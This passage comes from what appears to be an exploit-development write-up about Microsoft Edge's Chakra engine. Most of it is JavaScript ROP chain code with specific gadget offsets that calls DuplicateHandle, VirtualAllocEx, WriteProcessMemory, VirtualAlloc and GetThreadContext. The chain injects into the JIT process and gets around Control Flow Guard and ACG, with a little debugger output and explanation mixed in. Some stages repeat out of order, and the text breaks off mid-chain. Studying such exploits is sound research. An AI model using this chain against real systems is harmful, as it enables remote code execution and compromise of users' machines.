write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        

// GetThreadContext() ROP chain
// Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

// First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
// The value we need to set is 0x10001F
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// HANDLE hThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future mov qword [rax+0x20], rcx gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

// Call KERNELBASE!GetThreadContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        

Using the same method of setting a breakpoint on jmp rax we can examine the first gadget in our GetThreadContext ROP chain.

We start off our GetThreadContext ROP chain by preserving the address of our previous VirtualAlloc allocation (which is still in RAX) into the .data section of kernelbase.dll.

The next thing we will do is also preserve our VirtualAlloc allocation, specifically VirtualAlloc_allocation + 0x30 into the .data section of kernelbase.dll, as well. We have already pointed out that CONTEXT.ContextFlags is located at CONTEXT + 0x30 and, since our VirtualAlloc_allocation is acting as our CONTEXT structure, we can think of this as saving our ContextFlags address within the .data section of kernelbase.dll so we can write to it later with our needed 0x10001f value. Since our original base VirtualAlloc allocation was already in RAX, we can simply just add 0x30 to it, and perform another write.

At this point we have successfully saved out CONTEXT address and our CONTEXT.ContextFlags address in memory for persistent storage, for the duration of the exploit.

The next thing we will do is update CONTEXT.ContextFlags. Since we have already preserved the address of ContextFlags in memory (.data section of kernelbase.dll), we can simply pop this address into a register, dereference it, and update it accordingly (the pop rax gadget below is, again, to bypass the cmp instruction that is a residual instruction in our ROP gadget which requires a valid, writable address).

If we actually parse our VirtualAlloc allocation as a CONTEXT structure, we can see we properly set ContextFlags.

At this point our call is in the following state:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f


Let’s now step through more of the ROP chain and start out by retrieving our thread’s handle from the .data section of kernelbase.dll.

At this point our call is in the following state:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

	threadHandle,					// A handle to the thread we want to retrieve a CONTEXT structure for (our thread we created via CreateRemoteThread)

For our last parameter, lpContext, we simply just need to pass in the pointer returned earlier from VirtualAlloc (which we stored in the .data section of kernelbase.dll). Again, we use the same mov rdx, [rdx+0x8] gadget we have seen in this blog post. So instead of directly popping the address which points to our VirtualAlloc allocation, we pass in the address - 0x8 so that when the dereference happens, the +0x8 and the -0x8 offset each other. This is done with the following ROP gadgets:

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

Our call, after the above gadgets, is now ready to go as such:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

	threadHandle,					// A handle to the thread we want to retrieve a CONTEXT structure for (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)			// The buffer to receive the CONTEXT structure

After executing the call with pt we can see we successfully leaked the stack of the remote thread!

However, if we take a look at the RIP member, which should be a pointer to our ret gadget (theoretically), we can see it is not.

Instead, it is a call to RtlUserThreadStart. This makes total sense, as our thread was created in a suspended state - and wasn’t actually executed yet. So, the entry point of this thread is still on the start function. If we actually debug the JIT process and manually resume this thread (using Process Hacker, for instance), we can see execution actually fails (sorry for the WinDbg classic screenshots):

Remember earlier when I talked about the nuances of setting the entry point directly with our call to CreateRemoteThread? This is Control Flow Guard kicking in and exposing this nuance. When we set the routine for CreateRemoteThread to execute, we actually did so with a ret ROP gadget. As we know, most functions end with a ret statement - so this means we told our program we wanted to call into the end of a function. Control Flow Guard, when performing a call will check to see if the call target is a valid function. The way this manifests is through a bitmap of all known β€œvalid call targets”. CFG will check to see if you are calling into know targets at 0x10 byte boundaries - as functions should be aligned in this manner. Since we called into a function towards the end, we obviously didn’t call in a 0x10 byte alignment and, thus, CFG will kill the process as it has deemed to have detected an invalid function (and rightly so, we were maliciously trying to call into the middle of a function). The way we can get around this, is to use a call to SetThreadContext to manually update RIP to directly execute our ROP gadget after resuming, instead of asking CreateRemoteThread to perform a call instruction to it (which CFG will check). This will require a few extra steps, but we are nearing the end now.

Manipulating RIP and Preserving RSP

The next thing we are going to do is to preserve the location of RIP and RSP from our captured thread context. We will first start by locating RSP, which is at an offset of 0x98 within a CONTEXT structure. We will persistently store this in the .data section of kernelbase.dll.

We can use the following ROP snippet (including previous chains) to store CONTEXT.Rsp and to update CONTEXT.Rip directly. Remember, when we directly act on RIP instead of asking the thread to perform a call on our gadget (which CFG checks) we can β€œbypass the CFG check” and, thus, just directly return back to the stack.

// alert() for debugging

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
